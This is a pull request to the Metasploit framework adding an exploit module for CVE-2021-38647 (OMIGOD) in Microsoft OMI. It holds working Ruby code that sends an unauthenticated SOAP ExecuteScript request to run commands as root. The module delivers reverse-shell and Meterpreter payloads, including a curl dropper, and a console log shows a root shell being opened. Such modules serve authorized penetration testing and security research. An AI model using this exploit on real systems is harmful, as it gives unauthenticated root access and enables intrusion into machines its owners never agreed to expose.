### PR TITLE
Add Exploit for CVE-2021-38647 (OMIGOD RCE)

### DIFF
--- a/documentation/modules/exploit/linux/misc/cve_2021_38647_omigod.md
+++ b/documentation/modules/exploit/linux/misc/cve_2021_38647_omigod.md
@@ -1,0 +1,56 @@
+## Vulnerable Application
+
+By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will
+cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1
+(released September 8th 2021)
+
+## Verification Steps
+
+1. Start the application using the [Censys Dockerfile][1]
+    1. `docker build . -t ms-omi:cve-2021-38647`
+    2. `docker run --name cve-2021-38647 --rm -d -p 5985:5985 ms-omi:cve-2021-38647`
+2. Start `msfconsole`
+3. Do: `use exploit/linux/misc/cve_2021_38647_omigod`
+4. Set the module options
+5. Do: `exploit`
+6. You should get a shell.
+
+## Options
+
+## Scenarios
+
+### Ubuntu 20.04 x64, OMI v1.6.8, SCX v1.6.6
+
+```
+msf6 > use exploit/linux/misc/cve_2021_38647_omigod
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cve_2021_38647_omigod) > set RHOSTS 192.168.159.128
+RHOSTS => 192.168.159.128
+msf6 exploit(linux/misc/cve_2021_38647_omigod) > check
+[+] 192.168.159.128:5985 - The target is vulnerable. Command executed as uid 0.
+msf6 exploit(linux/misc/cve_2021_38647_omigod) > set TARGET Linux\ Dropper 
+TARGET => Linux Dropper
+msf6 exploit(linux/misc/cve_2021_38647_omigod) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/misc/cve_2021_38647_omigod) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:8443 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Command executed as uid 0.
+[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
+[*] Sending stage (3012548 bytes) to 192.168.159.128
+[*] Command Stager progress - 100.00% done (823/823 bytes)
+[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.128:41066 ) at 2021-10-26 10:53:18 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 10.0.2.100
+OS           : Ubuntu 20.04 (Linux 5.14.11-200.fc34.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+[1]: https://gist.github.com/dabdine/ac6aadde068cad4d58251453e688a84f

--- a/documentation/modules/exploit/linux/misc/cve_2021_38647_omigod.md
+++ b/documentation/modules/exploit/linux/misc/cve_2021_38647_omigod.md
@@ -2,7 +2,7 @@
 
 By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will
 cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1
-(released September 8th 2021)
+(released September 8th 2021).
 
 ## Verification Steps
 

--- a/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
+++ b/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
@@ -20,7 +20,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'on',
         'Description' => %q{
           By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
-          that will cause it to execute an operating system command as the root user.
+          that will cause it to execute an operating system command as the root user. This vulnerability was patched in
+          OMI version 1.6.8-1 (released September 8th 2021).
         },
         'Author' => [
           'Nir Ohfeld', # vulnerability discovery & research
@@ -29,11 +30,11 @@ class MetasploitModule < Msf::Exploit::Remote
           'wvu' # metasploit module
         ],
         'References' => [
-          %w[CVE 2021-38647],
-          %w[URL https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647],
-          %w[URL https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure],
-          %w[URL https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/],
-          %w[URL https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647]
+          ['CVE', '2021-38647'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647'],
+          ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],
+          ['URL', 'https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/'],
+          ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']
         ],
         'DisclosureDate' => '2021-09-14',
         'License' => MSF_LICENSE,
@@ -65,6 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'MeterpreterTryToFork' => true
         },
         'Notes' => {
+          'AKA' => ['OMIGOD'],
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

--- a/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
+++ b/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
@@ -10,7 +10,6 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
-  include Msf::Exploit::JavaDeserialization
 
   XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze
 
@@ -20,12 +19,21 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'on',
         'Description' => %q{
+          By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
+          that will cause it to execute an operating system command as the root user.
         },
         'Author' => [
-          'Spencer McIntyre',
-          'wvu'
+          'Nir Ohfeld', # vulnerability discovery & research
+          'Shir Tamari', # vulnerability discovery & research
+          'Spencer McIntyre', # metasploit module
+          'wvu' # metasploit module
         ],
         'References' => [
+          %w[CVE 2021-38647],
+          %w[URL https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647],
+          %w[URL https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure],
+          %w[URL https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/],
+          %w[URL https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647]
         ],
         'DisclosureDate' => '2021-09-14',
         'License' => MSF_LICENSE,
@@ -38,10 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
-              'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
-              }
+              'Type' => :unix_cmd
             }
           ],
           [
@@ -49,17 +54,15 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'linux',
               'Arch' => [ARCH_X86, ARCH_X64],
-              'Type' => :linux_dropper,
-              'DefaultOptions' => {
-                'CMDSTAGER::FLAVOR' => :curl,
-                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
-              }
+              'Type' => :linux_dropper
             }
           ]
         ],
         'DefaultTarget' => 1,
         'DefaultOptions' => {
-          'SSL' => true
+          'RPORT' => 5985,
+          'SSL' => false,
+          'MeterpreterTryToFork' => true
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
@@ -70,14 +73,19 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-      Opt::RPORT(5985),
       OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
     ])
   end
 
   def check
-    # TODO: write this
-    CheckCode::Vulnerable('hax hax hax')
+    http_res = send_command('id')
+    return CheckCode::Unknown if http_res.nil?
+    return CheckCode::Safe unless http_res.code == 200
+
+    cmd_res = parse_response(http_res)
+    return CheckCode::Unknown if cmd_res.nil? || cmd_res[:stdout] !~ /uid=(\d+)\(\S+\) /
+
+    return CheckCode::Vulnerable("Command executed as uid #{Regexp.last_match(1)}.")
   end
 
   def exploit
@@ -97,8 +105,32 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_command(cmd, _opts = {})
     vprint_status("Executing command: #{cmd}")
+    res = send_command(cmd)
 
-    res = send_request_cgi(
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
+    end
+
+    parse_response(res)
+  end
+
+  def parse_response(res)
+    return nil unless res&.code == 200
+
+    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
+    unless return_code == 0
+      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
+    end
+
+    {
+      return_code: return_code,
+      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
+      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
+    }
+  end
+
+  def send_command(cmd)
+    send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path),
       'ctype' => 'text/xml;charset=UTF-8',
@@ -112,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Remote
             </a:ReplyTo>
             <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
             <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
-            <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
+            <a:MessageID>uuid:#{Faker::Internet.uuid}</a:MessageID>
             <w:OperationTimeout>PT1M30S</w:OperationTimeout>
             <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
             <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
@@ -132,20 +164,5 @@ class MetasploitModule < Msf::Exploit::Remote
         </s:Envelope>
       ENVELOPE
     )
-
-    unless res && res.code == 200
-      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
-    end
-
-    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
-    unless return_code == 0
-      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
-    end
-
-    {
-      return_code: return_code,
-      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
-      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
-    }
   end
 end

--- a/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
+++ b/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
@@ -1,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::JavaDeserialization
+
+  XML_NS = { 'p' => 'http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem' }.freeze
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'on',
+        'Description' => %q{
+        },
+        'Author' => [
+          'Spencer McIntyre',
+          'wvu'
+        ],
+        'References' => [
+        ],
+        'DisclosureDate' => '2021-09-14',
+        'License' => MSF_LICENSE,
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :curl,
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(5985),
+      OptString.new('TARGETURI', [true, 'Base path', '/wsman'])
+    ])
+  end
+
+  def check
+    # TODO: write this
+    CheckCode::Vulnerable('hax hax hax')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      result = execute_command(payload.encoded)
+      if result
+        print_status(result[:stdout]) unless result[:stdout].blank?
+        print_error(result[:stderr]) unless result[:stderr].blank?
+      end
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path),
+      'ctype' => 'text/xml;charset=UTF-8',
+      'data' => Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+        <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema" xmlns:h="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd">
+          <s:Header>
+            <a:To>HTTP://127.0.0.1:5985/wsman/</a:To>
+            <w:ResourceURI s:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+            <a:ReplyTo>
+              <a:Address s:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+            </a:ReplyTo>
+            <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
+            <w:MaxEnvelopeSize s:mustUnderstand="true">102400</w:MaxEnvelopeSize>
+            <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
+            <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+            <w:Locale xml:lang="en-us" s:mustUnderstand="false"/>
+            <p:DataLocale xml:lang="en-us" s:mustUnderstand="false"/>
+            <w:OptionSet s:mustUnderstand="true"/>
+            <w:SelectorSet>
+              <w:Selector Name="__cimnamespace">root/scx</w:Selector>
+            </w:SelectorSet>
+          </s:Header>
+          <s:Body>
+            <p:ExecuteScript_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
+              <p:Script>#{Rex::Text.encode_base64(cmd)}</p:Script>
+              <p:Arguments/>
+              <p:timeout>0</p:timeout>
+              <p:b64encoded>true</p:b64encoded>
+            </p:ExecuteScript_INPUT>
+          </s:Body>
+        </s:Envelope>
+      ENVELOPE
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
+    end
+
+    return_code = res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:ReturnCode', XML_NS)&.content.to_i
+    unless return_code == 0
+      print_error("Failed to execute command: #{cmd} (status: #{return_code})")
+    end
+
+    {
+      return_code: return_code,
+      stdout: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdOut', XML_NS)&.content,
+      stderr: res.get_xml_document.at_xpath('//p:SCX_OperatingSystem_OUTPUT/p:StdErr', XML_NS)&.content
+    }
+  end
+end

--- a/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
+++ b/modules/exploits/linux/misc/cve_2021_38647_omigod.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'on',
+        'Name' => 'Microsoft OMI Management Interface Authentication Bypass',
         'Description' => %q{
           By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint
           that will cause it to execute an operating system command as the root user. This vulnerability was patched in
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Nir Ohfeld', # vulnerability discovery & research
           'Shir Tamari', # vulnerability discovery & research
           'Spencer McIntyre', # metasploit module
-          'wvu' # metasploit module
+          'wvu' # vulnerability research
         ],
         'References' => [
           ['CVE', '2021-38647'],
@@ -38,9 +38,9 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-09-14',
         'License' => MSF_LICENSE,
-        'Platform' => ['linux'],
+        'Platform' => ['linux', 'unix'],
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
-        'Privileged' => false,
+        'Privileged' => true,
         'Targets' => [
           [
             'Unix Command',


### PR DESCRIPTION
This adds an exploit for CVE-2021-38647 AKA OMIGOD. Exploiting the vulnerability results in unauthenticated remote command execution as root on affected systems. If the "Unix Command" target is selected, the command output will be printed out for the user.

Not all of the command stagers will work in the environment created by the docker file. The `bourne` stager which is the global default for Linux ATM in Metasploit will work, while `curl` will not.

## Verification

- [x] Start the application using the [Censys Dockerfile][1]
    - [x] `docker build . -t ms-omi:cve-2021-38647`
    - [x] `docker run --name cve-2021-38647 --rm -d -p 5985:5985 ms-omi:cve-2021-38647`
- [x] Start `msfconsole`
- [x] Do: `use exploit/linux/misc/cve_2021_38647_omigod`
- [x] Set the module options
- [x] Do: `exploit`
- [x] You should get a shell.


## Example

```
msf6 > use exploit/linux/misc/cve_2021_38647_omigod
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cve_2021_38647_omigod) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/misc/cve_2021_38647_omigod) > check
[+] 192.168.159.128:5985 - The target is vulnerable. Command executed as uid 0.
msf6 exploit(linux/misc/cve_2021_38647_omigod) > set TARGET Linux\ Dropper 
TARGET => Linux Dropper
msf6 exploit(linux/misc/cve_2021_38647_omigod) > set PAYLOAD linux/x64/meterpreter/reverse_tcp 
PAYLOAD => linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/misc/cve_2021_38647_omigod) > exploit
[*] Started reverse TCP handler on 192.168.159.128:8443 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Command executed as uid 0.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Sending stage (3012548 bytes) to 192.168.159.128
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.128:41066 ) at 2021-10-26 10:53:18 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 10.0.2.100
OS           : Ubuntu 20.04 (Linux 5.14.11-200.fc34.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

[1]: https://gist.github.com/dabdine/ac6aadde068cad4d58251453e688a84f